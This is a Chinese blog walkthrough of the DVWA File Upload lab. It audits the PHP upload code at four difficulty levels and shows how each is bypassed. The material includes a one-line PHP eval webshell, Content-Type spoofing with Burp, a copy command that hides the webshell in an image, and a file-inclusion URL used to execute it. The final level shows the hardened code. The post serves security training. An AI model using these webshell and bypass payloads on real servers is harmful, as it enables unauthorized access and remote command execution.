DVWA -File Upload-通关教程-完结

已于 2024-04-10 11:06:49 修改
阅读量1.6k 收藏 23
点赞数 36
分类专栏: Web安全技术 文章标签: 安全 网络安全 前端
于 2024-04-07 14:45:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39848882/article/details/137346379
版权
本文详细介绍了DVWA中的FileUpload页面的PHP代码,逐步揭示了从无过滤到增加文件类型和大小限制的安全升级过程,以及如何利用这些漏洞进行攻击和防御措施。
摘要由CSDN通过智能技术生成

DVWA -File Upload-通关教程-完结

文章目录

页面功能

此页面的功能为选择某个图片文件点击Upload按钮上传,上传成功后得知文件上传路径为DVWA\hackable\uploads
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Low

源码审计
这段 PHP 代码是一个简单的文件上传处理程序,它接受通过 POST 请求上传的文件,并将其保存到指定的目录中。
if( isset( $_POST[ 'Upload' ] ) ) {: 这行代码检查是否收到了名为 Upload 的 POST 请求。如果收到了该请求,说明用户尝试上传文件。
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";: 这行代码定义了上传文件的目标路径,即服务器上保存上传文件的目录。DVWA_WEB_PAGE_TO_ROOT 是一个常量,用于获取 DVWA 根目录的路径。文件将保存在 hackable/uploads/ 目录下。
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );: 这行代码将上传文件的名称附加到目标路径中,以便将文件保存到正确的位置。
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {: 这行代码使用 move_uploaded_file() 函数将临时存储的上传文件移动到目标路径。如果移动失败,则输出错误消息。
echo "<pre>{$target_path} succesfully uploaded!</pre>";: 如果移动成功,则输出成功消息,指示文件已成功上传到目标路径。
由此可见源码对上传文件直接移动,而文件的类型、内容没有做任何的检查、过滤。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

漏洞利用
由于没有任何的过滤,因此我们可以直接上传一个一句话木马.

<?php @eval($_POST['kfc']) ?>

直接上传,网页没有进行过滤,直接返回了上传成功的信息。
在这里插入图片描述
访问Webshell地址,页面为空白页面即为正常解析执行。

在这里插入图片描述打开蚁剑,使用上传的一句话木马进行连接,直接 Webshell。此时可以随意访问服务器上的任意文件,进行任意操作。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Medium

源码审计
这段 PHP 代码是一个带有文件类型和大小限制的文件上传处理程序。
if( isset( $_POST[ 'Upload' ] ) ) {: 这行代码检查是否收到了名为 Upload 的 POST 请求。如果收到了该请求,说明用户尝试上传文件。
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";: 这行代码定义了上传文件的目标路径,即服务器上保存上传文件的目录。DVWA_WEB_PAGE_TO_ROOT 是一个常量,用于获取 DVWA 根目录的路径。文件将保存在 hackable/uploads/ 目录下。
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );: 这行代码将上传文件的名称附加到目标路径中,以便将文件保存到正确的位置。
// File information: 这部分代码获取了上传文件的信息,包括文件名、文件类型和文件大小。
// Is it an image?: 这行代码检查上传文件的类型和大小是否符合要求。如果上传文件是 JPEG 或 PNG 格式,并且文件大小不超过 100KB,则继续执行上传操作;否则输出错误消息。
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {: 这行代码使用 move_uploaded_file() 函数将临时存储的上传文件移动到目标路径。如果移动失败,则输出错误消息。
echo "<pre>{$target_path} succesfully uploaded!</pre>";: 如果移动成功,则输出成功消息,指示文件已成功上传到目标路径。
else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; }: 如果上传文件不是 JPEG 或 PNG 格式,或者文件大小超过 100KB,则输出错误消息,指示上传的文件不符合要求。
由此可见源码会获取文件的文件名、文件类型和文件大小,它要求文件类型必须是 jpeg 或者 png,同时限制文件大小不能超过 100000B(约为97.6KB)。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

漏洞利用
此时我们再直接传输上面的一句话木马,会发现上传失败。
在这里插入图片描述
先做个一句话木马,然后用 brup 抓包,看到上传的 PHP 文件类型会被显示在包中。
在这里插入图片描述

修改文件类型为 image/png,然后放包。
在这里插入图片描述

可以看到虽然我们传的还是一句话木马,但是通过修改 http 报文可以通过网页的白名单检测,再次蚁剑连接即可。
在这里插入图片描述

High

源码审计
这段 PHP 代码是一个带有更严格文件类型和大小限制的文件上传处理程序
if( isset( $_POST[ 'Upload' ] ) ) {: 这行代码检查是否收到了名为 Upload 的 POST 请求。如果收到了该请求,说明用户尝试上传文件。
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";: 这行代码定义了上传文件的目标路径,即服务器上保存上传文件的目录。DVWA_WEB_PAGE_TO_ROOT 是一个常量,用于获取 DVWA 根目录的路径。文件将保存在 hackable/uploads/ 目录下。
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );: 这行代码将上传文件的名称附加到目标路径中,以便将文件保存到正确的位置。
// File information: 这部分代码获取了上传文件的信息,包括文件名、文件扩展名、文件大小和临时文件路径。
// Is it an image?: 这行代码检查上传文件的类型和大小是否符合要求,并使用 getimagesize() 函数验证上传文件是否为有效的图像文件。如果上传文件是 JPEG 或 PNG 格式、文件大小不超过 100KB,并且是有效的图像文件,则继续执行上传操作;否则输出错误消息。
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {: 这行代码使用 move_uploaded_file() 函数将临时存储的上传文件移动到目标路径。如果移动失败,则输出错误消息。
echo "<pre>{$target_path} succesfully uploaded!</pre>";: 如果移动成功,则输出成功消息,指示文件已成功上传到目标路径。
else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; }: 如果上传文件不符合要求,则输出错误消息,指示上传的文件不符合要求。
重点:strrpos(string,find,start) 函数返回字符串 find 在另一字符串 string 中最后一次出现的位置,如果没有找到字符串则返回 false,可选参数 start 规定在何处开始搜索。getimagesize(string filename) 函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头则报错。源码通过字符串匹配来确定文件后缀名,并且查看文件的相关参数,提高了过滤的强度。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

漏洞利用
由于源码会去检查文件头,现在我们不能再传 php 文件了,应该把一句话木马包在一张图片里面。
在这里插入图片描述

首先我们要准备一张图片和一句话木马,然后使用 copy 命令把两个文件合成为一个文件。

copy panda.jpeg/b + webshell.txt panda2.jpeg		//注意,此命令需要在windows下执行

在这里插入图片描述

然后直接上传,网页提示上传成功。但是此时是不能用蚁剑连接的,因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。这里服务器将木马文件解析成了图片文件,因此向其发送 post 请求时,服务器并不会执行相应命令。
在这里插入图片描述

因此我们要把这张图片当做 php 来执行才行,我们可以用File Inclusion(文件包含) 漏洞,构造 payload。

?page=file:///E:\phpStudy\WWW\DVWA\hackable\uploads\panda2.jpeg

访问下看看,可以看到这个 url 使得一句话木马被解析,也就是说这个时候就可以使用蚁剑或者中国菜刀连接。
链接URL:http://192.168.197.208/DVWA/vulnerabilities/fi/?page=file:///E:\phpStudy\WWW\DVWA\hackable\uploads\panda2.jpeg
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Impossible

源码审计
到目前为止,源码将检查所有级别的所有内容。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>
文刀竹肃
关注
  • 36
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
DVWA--file upload (文件上传)
weixin_50342860的博客
08-23 1360
目录风险lowmediumhigh总结 风险 对上传的文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 1621
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
DVWA 文件包含File Inclusion
最新发布
moonlightsunshin的博客
05-18 257
执行后会写入一个shell.php的后门代码通过前面我们利用报错得到路径。源码分析对我们传入的参数进行了file限制我们文件路径头必须是file。,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用。llow_url_fopen和allow_url_include为ON。开发人员一般希望代码更灵活,所以将被包含的文件。对http://和../,..\有过滤直接用双写绕过就行。服务端又没有做合理的校检或者校检被绕过。则可能存在远程文件包含漏洞。就造成了文件包含漏洞。
DVWA-文件上传upload
Cwillchris的博客
10-28 2053
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、查看源码及分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? //文件的目标路径hackable/uploads/,也就是文件上传的位置 $target_path = DVWA_WEB
DVWA--upload
weixin_30385925的博客
05-21 232
文件上传漏洞 0x01了解文件上传漏洞的用处是用来干什么的 什么是文件上传漏洞? 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件...
DVWAFile Upload
baynk的博客
10-29 867
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ File...
DVWA-File upload
yangbz123的博客
06-15 152
Low级别 源代码如下 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-文件上传(File Upload
weixin_58954236的博客
08-20 766
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA系列File Upload
crystal919的博客
03-24 148
File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 下面对四种级别的代码进行分析。 low 服务器端核心代码 <?php if( iss...
DVWA---文件上传
孤的博客
11-20 407
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWA靶场-----FIle Upload(文件上传)
m0_65712192的博客
11-14 1932
DVWA靶场-----FIle Upload(文件上传)
DVWA靶场系列(四)—— File Upload(文件上传)
qq_45612828的博客
07-12 5883
DVWA靶场系列(四)—— File Upload(文件上传)
dvwa的文件上传漏洞验证upload
小雨的博客
03-28 3823
DVWA = Damn Vulnerable Web App 长这样 upload漏洞upload 可上传文件来实现利用 利用weevly生成一个shell脚本 weevely简介:weevely是一款基于python编写的webshell生成、管理工具。 weevely generate 123456 /root/shell.php 然后上传这个shell 出现successful uploaded, 然后呢,构造url看这个shell是否上传成功。如...
DVWAUpload全级笔记
底层社会中的弱智
06-04 447
LOW: 下列代码只是实现了上传,没有任何的门槛 <?php if (isset($_POST['Upload'])) { //isset函数的意思判断是否是POST的方式上传的 $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $...
dvwa靶场文件上传high
W286734的博客
01-25 1605
合成图片码的方法此链接的最下面的部分上传图片码尝试连接这里因为图片为png格式无法解析但是有的图片码是可以直接解析。此时我们可以利用dvwa的文件包含low那一关尝试,因为在文件包含漏洞中会把不是php格式的文件也按照php文件解析。
DVWA Upload漏洞(medium)
1ame的博客
09-19 1736
<?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $target_path . basename($_FILES['uploaded']['name']);
DVWAupload文件上传漏洞(全难度)(小白向)
xihaxiha9的博客
04-19 2550
DVWA的文件上传详解
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHP和MySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多种常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击、命令执行等,用户可以通过对这些漏洞进行测试和攻击来提高自己的网络安全意识和技能。 dvwa-master zip的安装非常简便,只需将其解压到服务器的Web目录下,并配置好数据库连接信息即可。一旦安装完成,用户就可以通过浏览器访问dvwa-master zip的前端界面,并开始进行安全测试和漏洞扫描。 dvwa-master zip提供了多个不同的安全级别,从易到难,供用户选择。在低级别中,漏洞和脆弱性的例子会更为简单和明显;而在高级别中,这些漏洞将会更加难以察觉和利用,需要用户具备更高的技术水平。 通过dvwa-master zip,用户可以模拟和测试真实的网络安全风险,学习如何防范和修复相关漏洞。它对于安全工程师、渗透测试人员、Web开发人员等具有较高的教育和培训价值。值得注意的是,dvwa-master zip仅用于合法的安全研究和学习目的,未经授权的攻击行为是不被允许的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

文刀竹肃

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值